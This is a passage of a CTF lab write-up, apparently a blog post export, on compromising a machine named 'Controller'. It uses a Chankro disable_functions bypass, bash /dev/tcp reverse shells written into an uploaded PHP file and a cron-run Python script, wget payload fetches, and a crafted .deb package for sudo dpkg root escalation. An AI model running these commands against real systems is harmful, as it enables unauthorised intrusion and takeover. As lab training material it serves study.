                        .&#039;  .&#039; `\\   \n                                  ,---.&#039;     \\  \n                                  |   |  .`\\  | \n                                  :   : |  &#039;  | \n                                  |   &#039; &#039;  ;  : \n                                  &#039;   | ;  .  
| \n                                  |   | :  |  &#039; \n                                  &#039;   : | \/  ;  \n                                  |   | &#039;` ,\/   \n                                  ;   :  .&#039;     \n                                  |   ,.&#039;       \n                                  &#039;---&#039;         \n\n                        authors: __c3rb3ru5__, $_SpyD3r_$\n\nPlease add the following functions in your disable_functions option: \npcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,error_log,link,symlink,syslog,ld,mail,mb_send_mail\nIf PHP-FPM is there stream_socket_sendto,stream_socket_client,fsockopen can also be used to be exploit by poisoning the request to the unix socket<\/code><\/pre>\n<p>Many functions turn out to be usable, including the <strong>mb_send_mail<\/strong> function, so try a tool suggested by <code>HackTricks<\/code>: <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/php-tricks-esp\/php-useful-functions-disable_functions-open_basedir-bypass#bypass-using-chankro\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/php-tricks-esp\/php-useful-functions-disable_functions-open_basedir-bypass#bypass-using-chankro<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ git clone https:\/\/github.com\/TarlogicSecurity\/Chankro.git\nCloning into &#039;Chankro&#039;...\nremote: Enumerating objects: 59, done.\nremote: Total 59 (delta 0), reused 0 (delta 0), pack-reused 59 (from 
1)\nReceiving objects: 100% (59\/59), 35.91 KiB | 162.00 KiB\/s, done.\nResolving deltas: 100% (26\/26), done.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ cd Chankro    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/Chankro]\n\u2514\u2500$ ls -la    \ntotal 80\ndrwxr-xr-x 3 kali kali  4096 Sep  5 00:55 .\ndrwxr-xr-x 4 kali kali  4096 Sep  5 00:55 ..\n-rw-r--r-- 1 kali kali  2436 Sep  5 00:55 chankro.py\ndrwxr-xr-x 8 kali kali  4096 Sep  5 00:55 .git\n-rw-r--r-- 1 kali kali  7292 Sep  5 00:55 hook32.so\n-rw-r--r-- 1 kali kali  8504 Sep  5 00:55 hook64.so\n-rw-r--r-- 1 kali kali   444 Sep  5 00:55 hook.c\n-rw-r--r-- 1 kali kali 35141 Sep  5 00:55 LICENSE\n-rw-r--r-- 1 kali kali   904 Sep  5 00:55 README.md\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/Chankro]\n\u2514\u2500$ vim shell.sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/Chankro]\n\u2514\u2500$ batcat shell.sh \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u25
00\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500       \u2502 File: shell.sh\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500   1   \u2502 bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.10.102\/2345 
&lt;&amp;1&#039;\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/Chankro]\n\u2514\u2500$ python2 chankro.py --arch 64 --input shell.sh --path \/srv\/www\/php --output shell.php      \n\n     -=[ Chankro ]=-\n    -={ @TheXC3LL }=-\n\n[+] Binary file: shell.sh\n[+] Architecture: x64\n[+] Final PHP: shell.php\n\n[+] File created!<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e0a\u4f20\u6587\u4ef6\u53cd\u5f39shell\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410552.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410552.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905130158975\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8bbf\u95ee\u6fc0\u6d3b\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.101:8000\/uploads\/shell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410553.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410553.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905130324762\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5b9a\u65f6\u4efb\u52a1\u63d0\u6743<\/h3>\n<pre><code class=\"language-bash\">(remote) webservices@controller:\/srv\/www\/php\/uploads$ cd ~\n(remote) webservices@controller:\/home\/webservices$ ls -la\ntotal 36\ndrwxr-xr-x 3 webservices webservices 4096 Jun 27  2021 .\ndrwxr-xr-x 5 root        root        4096 Jun 27  2021 ..\nlrwxrwxrwx 1 webservices webservices    9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 webservices webservices  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 webservices webservices 3771 Feb 25  2020 .bashrc\ndrwxrwxr-x 3 webservices webservices 4096 Jun 27  2021 .local\n-rw-r--r-- 1 webservices webservices  807 Feb 25  2020 .profile\n-rw-rw-r-- 1 webservices webservices   75 
Jun 27  2021 .selected_editor\n-rw------- 1 webservices webservices  916 Jun 27  2021 .viminfo\n-rw-rw-r-- 1 webservices webservices   14 Jun 27  2021 user.txt\n(remote) webservices@controller:\/home\/webservices$ cat user.txt \n............\n(remote) webservices@controller:\/home\/webservices$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/snap\/core18\/2074\/bin\/mount\n\/snap\/core18\/2074\/bin\/ping\n\/snap\/core18\/2074\/bin\/su\n\/snap\/core18\/2074\/bin\/umount\n\/snap\/core18\/2074\/usr\/bin\/chfn\n\/snap\/core18\/2074\/usr\/bin\/chsh\n\/snap\/core18\/2074\/usr\/bin\/gpasswd\n\/snap\/core18\/2074\/usr\/bin\/newgrp\n\/snap\/core18\/2074\/usr\/bin\/passwd\n\/snap\/core18\/2074\/usr\/bin\/sudo\n\/snap\/core18\/2074\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core18\/2074\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core18\/2829\/bin\/mount\n\/snap\/core18\/2829\/bin\/ping\n\/snap\/core18\/2829\/bin\/su\n\/snap\/core18\/2829\/bin\/umount\n\/snap\/core18\/2829\/usr\/bin\/chfn\n\/snap\/core18\/2829\/usr\/bin\/chsh\n\/snap\/core18\/2829\/usr\/bin\/gpasswd\n\/snap\/core18\/2829\/usr\/bin\/newgrp\n\/snap\/core18\/2829\/usr\/bin\/passwd\n\/snap\/core18\/2829\/usr\/bin\/sudo\n\/snap\/core18\/2829\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core18\/2829\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/21759\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/2318\/usr\/bin\/chfn\n\/snap\/core20\/2318\/usr\/bin\/chsh\n\/snap\/core20\/2318\/usr\/bin\/gpasswd\n\/snap\/core20\/2318\/usr\/bin\/mount\n\/snap\/core20\/2318\/usr\/bin\/newgrp\n\/snap\/core20\/2318\/usr\/bin\/passwd\n\/snap\/core20\/2318\/usr\/bin\/su\n\/snap\/core20\/2318\/usr\/bin\/sudo\n\/snap\/core20\/2318\/usr\/bin\/umount\n\/snap\/core20\/2318\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2318\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/sbin\/sensible-mda\n\/usr\/bin\/at\n\/usr\/bin\/procmail\n\/usr\/bin\/pkexec\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/b
in\/fusermount\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/ksu\n\/usr\/bin\/sudo\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/eject\/dmcrypt-get-device<\/code><\/pre>\n<p>Tried to escalate with at, but it did not work; upload pspy64 to monitor:<\/p>\n<pre><code class=\"language-bash\">(remote) webservices@controller:\/home\/webservices$ cd \/tmp\n(remote) webservices@controller:\/tmp$ wget http:\/\/192.168.10.102:8888\/lpspy64\n(remote) webservices@controller:\/tmp$ chmod +x lpspy64 \n(remote) webservices@controller:\/tmp$ .\/lpspy64<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410554.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410554.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905131015679\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Take a look at this file:<\/p>\n<pre><code class=\"language-bash\">(remote) webservices@controller:\/tmp$ cat \/opt\/website.py\nimport socket\nimport sys\nimport os\n\nscan = &#039;127.0.0.1&#039;\nport = 80\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.settimeout(1)\ncheck = s.connect_ex((scan,port))\nif check == 0:\n        os.system(&quot;echo &#039;website up&#039;&gt;&gt; 
\/opt\/logs\/log.txt&quot;)\nelse:\n        os.system(&quot;echo &#039;website down&#039;&gt;&gt; \/opt\/logs\/log.txt&quot;)\ns.close\nsys.exit(0)\n(remote) webservices@controller:\/tmp$ ls -la \/opt\/website.py\n-rwxrwx--- 1 webservices server 317 Jun 27  2021 \/opt\/website.py<\/code><\/pre>\n<p>It is writable, so try a reverse shell!<\/p>\n<pre><code class=\"language-bash\">(remote) webservices@controller:\/tmp$ nano \/opt\/website.py \n(remote) webservices@controller:\/tmp$ cat \/opt\/website.py\nimport socket\nimport sys\nimport os\n\nos.system(&#039;bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.10.102\/3456 &lt;&amp;1&quot;&#039;)\nscan = &#039;127.0.0.1&#039;\nport = 80\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.settimeout(1)\ncheck = s.connect_ex((scan,port))\nif check == 0:\n        os.system(&quot;echo &#039;website up&#039;&gt;&gt; \/opt\/logs\/log.txt&quot;)\nelse:\n        os.system(&quot;echo &#039;website down&#039;&gt;&gt; \/opt\/logs\/log.txt&quot;)\ns.close\nsys.exit(0)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410555.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410555.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905135619355\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>dpkg privilege escalation to root<\/h3>\n<p>Reference: <a 
href=\"https:\/\/gtfobins.github.io\/gtfobins\/dpkg\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/dpkg\/#sudo<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410556.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905140007275\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) server@controller:\/home\/server$ sudo -l\nMatching Defaults entries for server on controller:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser server may run the following commands on controller:\n    (root) NOPASSWD: \/bin\/dpkg -i *\n(remote) server@controller:\/home\/server$ fpm\nbash: fpm: command not found<\/code><\/pre>\n<p>\u5728kali\u4e0a\u5f04\u4e00\u4e0b;<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ TF=$(mktemp -d)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ echo &#039;exec \/bin\/bash&#039; &gt; $TF\/x.sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ fpm -n x -s dir -t deb -a all --before-install .\/x.sh $TF  \nNo such file (for before_install): &quot;\/home\/kali\/temp\/Controller\/x.sh&quot; {:level=&gt;:error}\n\/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/lib\/fpm\/command.rb:460:in 
`read&#039;: No such file or directory @ rb_sysopen - \/home\/kali\/temp\/Controller\/x.sh (Errno::ENOENT)\n        from \/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/lib\/fpm\/command.rb:460:in `block in execute&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/lib\/fpm\/command.rb:463:in `execute&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/clamp-1.0.1\/lib\/clamp\/command.rb:68:in `run&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/lib\/fpm\/command.rb:591:in `run&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/clamp-1.0.1\/lib\/clamp\/command.rb:133:in `run&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/bin\/fpm:7:in `&lt;top (required)&gt;&#039;\n        from \/usr\/local\/bin\/fpm:25:in `load&#039;\n        from \/usr\/local\/bin\/fpm:25:in `&lt;main&gt;&#039;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ fpm -n x -s dir -t deb -a all --before-install $TF\/x.sh $TF\nCreated package {:path=&gt;&quot;x_1.0_all.deb&quot;}\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ ls -la\ntotal 36\ndrwxr-xr-x   4 kali kali 4096 Sep  5 01:58 .\ndrwxr-xr-x 129 kali kali 4096 Sep  4 23:09 ..\ndrwxr-xr-x   3 kali kali 4096 Sep  5 00:58 Chankro\ndrwxr-xr-x   4 kali kali 4096 Sep  5 00:50 dfunc-bypasser\n-rw-r--r--   1 kali kali   60 Sep  4 23:55 ping1.py\n-rw-r--r--   1 kali kali   69 Sep  5 00:04 ping2.py\n-rw-r--r--   1 kali kali   49 Sep  4 23:42 ping.py\n-rw-r--r--   1 kali kali  102 Sep  5 00:09 shell.py\n-rw-r--r--   1 kali kali 1096 Sep  5 01:58 x_1.0_all.deb<\/code><\/pre>\n<p>Transfer it over and escalate:<\/p>\n<pre><code class=\"language-bash\">(remote) server@controller:\/home\/server$ cd \/tmp\n(remote) server@controller:\/tmp$ wget http:\/\/192.168.10.102:8888\/x_1.0_all.deb\n--2024-09-05 06:00:47--  http:\/\/192.168.10.102:8888\/x_1.0_all.deb\nConnecting to 192.168.10.102:8888... 
connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1096 (1.1K) [application\/vnd.debian.binary-package]\nSaving to: \u2018x_1.0_all.deb\u2019\n\nx_1.0_all.deb                                   100%[====================================================================================================&gt;]   1.07K  --.-KB\/s    in 0s      \n\n2024-09-05 06:00:47 (44.4 MB\/s) - \u2018x_1.0_all.deb\u2019 saved [1096\/1096]\n\n(remote) server@controller:\/tmp$ chmod 700 x_1.0_all.deb\n(remote) server@controller:\/tmp$ sudo dpkg -i x_1.0_all.deb\nSelecting previously unselected package x.\n(Reading database ... 76528 files and directories currently installed.)\nPreparing to unpack x_1.0_all.deb ...\nroot@controller:\/# cd ~\nroot@controller:~# ls -la\ntotal 56\ndrwx------  6 root root  4096 Jun 27  2021 .\ndrwxr-xr-x 20 root root  4096 Jun 27  2021 ..\nlrwxrwxrwx  1 root root     9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc\ndrwx------  2 root root  4096 Jun 27  2021 .cache\ndrwxr-xr-x  3 root root  4096 Jun 27  2021 .local\n-rw-------  1 root root   495 Jun 27  2021 .mysql_history\n-rw-r--r--  1 root root   161 Dec  5  2019 .profile\n-rw-r--r--  1 root root    75 Jun 27  2021 .selected_editor\ndrwx------  2 root root  4096 Jun 27  2021 .ssh\n-rw-------  1 root root 10710 Jun 27  2021 .viminfo\n-rw-r--r--  1 root root    24 Jun 27  2021 root.txt\ndrwxr-xr-x  3 root root  4096 Jun 27  2021 snap<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410557.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410557.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905140221739\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=wXnUaOHGZXk\">https:\/\/www.youtube.com\/watch?v=wXnUaOHGZXk<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1AM4m1f7LT\/\">https:\/\/www.bilibili.com\/video\/BV1AM4m1f7LT\/<\/a><\/p>\n<p><a href=\"https:\/\/raw.githubusercontent.com\/CooLaToS\/wt\/main\/Controller\">https:\/\/raw.githubusercontent.com\/CooLaToS\/wt\/main\/Controller<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/xdeclearn\/article\/details\/120740844\">https:\/\/blog.csdn.net\/xdeclearn\/article\/details\/120740844<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Controller Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller] 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-795","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/795","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=795"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/795\/revisions"}],"predecessor-version":[{"id":796,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/795\/revisions\/796"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=795"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=795"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=795"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}